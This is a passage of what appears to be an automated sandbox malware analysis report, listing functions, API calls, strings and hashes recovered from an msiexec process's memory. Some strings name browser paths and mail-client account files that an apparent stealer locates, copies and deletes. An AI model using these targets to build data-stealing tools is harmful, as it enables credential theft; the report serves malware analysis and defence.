                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
                                                                                                                                                                                                          • API String ID: 1174141254-3709686828
                                                                                                                                                                                                          • Opcode ID: 384bc3ab0ad7df45a767dd409a9c61c56fa6643053c4dff915c00884159724c7
                                                                                                                                                                                                          • Instruction ID: 90fa04378ca8dbbe54157d7fcefb33f2324946c0208bc0188758b66a949be7ea
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384bc3ab0ad7df45a767dd409a9c61c56fa6643053c4dff915c00884159724c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80914B76D10219AEDF04DFA4DCA4BEEBBB5FF61704F54011DE409A7290EB78A905CB90
                                                                                                                                                                                                          Function 214DA98C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 214DA9A8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 214DA9BE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 214DA9CC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 214DA9DA
                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,?,00000000,00000000), ref: 214DAA24
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CreateEventHandleModule
                                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
                                                                                                                                                                                                          • API String ID: 4127270050-758797311
                                                                                                                                                                                                          • Opcode ID: da3c8a0a96baaca5468c22bcf0182be9370c375c43b35f88d10393802dfbb181
                                                                                                                                                                                                          • Instruction ID: e9c30d39fff85267e028ba9276b0476bb6d64a27feab172d9e2ea3dc7e771be9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3c8a0a96baaca5468c22bcf0182be9370c375c43b35f88d10393802dfbb181
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 521108B3D412127FEA101FB55CA8F2A2E998B16B11F21011FFE0DD2740DEB8C81497A2
                                                                                                                                                                                                          Function 21DEAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                                                          • Opcode ID: 0485a8139d8e25d7c79607e5c6086a69f76733201f030ebd3084ebaa8e2b282d
                                                                                                                                                                                                          • Instruction ID: f6ab5c5e74b6bd3ec6b0831176f10bc7a1855a99180b347f049d8410181127c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0485a8139d8e25d7c79607e5c6086a69f76733201f030ebd3084ebaa8e2b282d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7515C7890060BCBDF00DFA4D98C59DBFB9FF4A312F51468DE588A7654CB768A24CB24
                                                                                                                                                                                                          Function 214EEC43 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                                                          • Opcode ID: 8cb36c7917c8d7af9a9c4eec4ed49d966698ba525e0a59dedf2590dac015e986
                                                                                                                                                                                                          • Instruction ID: 45b7989677adba3f7f230fce198c2c0f0edc8b7c51f51cc831c01ddfa465aab7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cb36c7917c8d7af9a9c4eec4ed49d966698ba525e0a59dedf2590dac015e986
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB512C7190050ACBDF00DF68E68C99DBFB8FF4A322F604299D54CB6354CB768A25CB55
                                                                                                                                                                                                          Function 21DE1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D1B
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21DE1D37
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D4B
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D58
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D72
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D7D
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D8A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                                          • Opcode ID: d7ae2618fe17344577e3f7169acc3e260151bc02177eb1134e6a8314347b7e48
                                                                                                                                                                                                          • Instruction ID: c1096b6699c97cf31b92dace916388f78f4326f20d0375ae6852aac6f6d8159e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7ae2618fe17344577e3f7169acc3e260151bc02177eb1134e6a8314347b7e48
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 292160B1A4122CFFD711DBA48C8CFEB7AACEB18396F0405A9F505D2140DA759E458B70
                                                                                                                                                                                                          Function 21DE39BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                                                          • Opcode ID: 9ef096a49158bcd46ba09b5239d37b6f914fa19a0d5546b5ca442e92a1a53f9e
                                                                                                                                                                                                          • Instruction ID: cb9806bbc713a1262e4754bc8a7097eef449180fbdfd4085ed0aa1d15486b28e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ef096a49158bcd46ba09b5239d37b6f914fa19a0d5546b5ca442e92a1a53f9e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A111BB32E41A21FBD7129A258C8CE2B3B6C5F067A2F10011DE95DAB181DB35DA50C7E0
                                                                                                                                                                                                          Function 21DE1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21DE1038
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21DE104B
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21DE1061
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21DE1075
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21DE1090
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 21DE10B8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                                          • Opcode ID: edd2534cb30f00c43409e06df526338216f1d9d0018c532a745c991554180329
                                                                                                                                                                                                          • Instruction ID: 5683168477d0054fb4a7ecdec6448966aa150662709b7049a7db9ec157658374
                                                                                                                                                                                                          • Opcode Fuzzy Hash: edd2534cb30f00c43409e06df526338216f1d9d0018c532a745c991554180329
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21A135A00329DFCF24DB60DC4CEDF3B68EF48366F10469AE969931A1DE309A95CB50
                                                                                                                                                                                                          Function 21DE11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 21DE1E89: lstrlenW.KERNEL32(?,?,?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1E9A
                                                                                                                                                                                                            • Part of subcall function 21DE1E89: lstrcatW.KERNEL32(?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EAC
                                                                                                                                                                                                            • Part of subcall function 21DE1E89: lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EB3
                                                                                                                                                                                                            • Part of subcall function 21DE1E89: lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EC8
                                                                                                                                                                                                            • Part of subcall function 21DE1E89: lstrcatW.KERNEL32(?,21DE10DF,?,21DE10DF,?,?,?,00000000), ref: 21DE1ED3
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21DE122A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                                          • Opcode ID: ee81359a9f527e21aee8dcfa15c5ca1257d6bc28644dbdf05c3da38aaab9d36a
                                                                                                                                                                                                          • Instruction ID: 22cd4ae1fb6af6a2e8029d31aa312c650e9b6b2a8b1656e5fb3398538b57c0f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee81359a9f527e21aee8dcfa15c5ca1257d6bc28644dbdf05c3da38aaab9d36a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21C579A10218EAEB149BD0EC85FED7339EF40B15F00054AF608EB1E0E6B11E848768
                                                                                                                                                                                                          Function 21DE4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21DE4AEA,?,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000), ref: 21DE4B59
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21DE4B6C
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,21DE4AEA,?,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000,?,21DE2082), ref: 21DE4B8F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                          • Opcode ID: a60506795605ad67783ad75396b5df167d7b7d49c2a15b1d5e99d4c950e8af9e
                                                                                                                                                                                                          • Instruction ID: fbffb35b76b5df8de41e37526b2badc468a900870fd3f27d9fafd6e5dcbe0330
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a60506795605ad67783ad75396b5df167d7b7d49c2a15b1d5e99d4c950e8af9e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F03C31940518FFDB119F91C80CB9EBFB9EF49352F00416CE909A6150DF369A55CB90
                                                                                                                                                                                                          Function 214E4C41 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,214E4BF2,00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002), ref: 214E4C61
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 214E4C74
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,214E4BF2,00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002), ref: 214E4C97
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                          • Opcode ID: f4bf8bcc1569683a8679e063a9742af935829ba8e5e6e8eebb0c5652f34ac19f
                                                                                                                                                                                                          • Instruction ID: f8097689899dacec18480b1274abb658dd100a3a91bf2928651b5593f22c0d89
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4bf8bcc1569683a8679e063a9742af935829ba8e5e6e8eebb0c5652f34ac19f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F04435541218BFDB119F91C908F9EBFB9EB19715F410158B90DE2350CF349950CB90
                                                                                                                                                                                                          Function 21DE9492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21DE9C07,?,00000000,?,00000000,00000000), ref: 21DE94D4
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21DE9590
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,21DE9C07,00000000,?,?,?,?,?,?,?,?,?,21DE9C07,?), ref: 21DE95AF
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,21DE9C07,00000000,?,?,?,?,?,?,?,?,?,21DE9C07,?), ref: 21DE95E8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 977765425-0
                                                                                                                                                                                                          • Opcode ID: 5634078e29c385e4a917755994860bbc7fb76f06f8e4a9679d275b544a55ddb2
                                                                                                                                                                                                          • Instruction ID: 132750f6c88df107e022f5352a7c745abd8b11271b6f7cf7c91569d9a2c45226
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5634078e29c385e4a917755994860bbc7fb76f06f8e4a9679d275b544a55ddb2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C51A071D01209EFDB05CFA8C899AEEBBF8EF49311F14411EE959E7291D630AA51CF60
                                                                                                                                                                                                          Function 214EA6A6 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,214EAE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 214EA6E8
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,FF8BC35D,00000005,00000000,00000000), ref: 214EA7A4
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,214EAE1B,00000000,?,?,?,?,?,?,?,?,?,214EAE1B,?), ref: 214EA7C3
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,214EAE1B,00000000,?,?,?,?,?,?,?,?,?,214EAE1B,?), ref: 214EA7FC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 977765425-0
                                                                                                                                                                                                          • Opcode ID: 5e27f5b288191e59e6b16e79b1a469bd2a787d233662808d465c829cc894a939
                                                                                                                                                                                                          • Instruction ID: cd644e8f322075ca9f584c8acd2256ddd3248f4fa90dc1d8b6fa53080dba694b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e27f5b288191e59e6b16e79b1a469bd2a787d233662808d465c829cc894a939
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 945181719002099FDB10CFA4C885EEEBBF9FF19311F24416AEA5DE7351E6309951CBA0
                                                                                                                                                                                                          Function 21DE1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1E9A
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EAC
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EB3
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EC8
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,21DE10DF,?,21DE10DF,?,?,?,00000000), ref: 21DE1ED3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                          • Opcode ID: a4f09fee757fb3a6e93cf2ca9881ee20e81e82ebad288751a360bd0d464d7e5c
                                                                                                                                                                                                          • Instruction ID: 1b0f609afe7786a11ea3a7aeb4d6484b86f957f3a84033c514cc761705e99fb6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4f09fee757fb3a6e93cf2ca9881ee20e81e82ebad288751a360bd0d464d7e5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F08926140520FAE6252769AC89E7F7F7CEFC6B62B04041DF60C831909B55595293B5
                                                                                                                                                                                                          Function 21DE15DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21DE190E,?,?,00000000,?,00000000), ref: 21DE1643
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,21DE190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21DE165A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,21DE190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21DE1661
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,21DE190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21DE1686
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1475610065-0
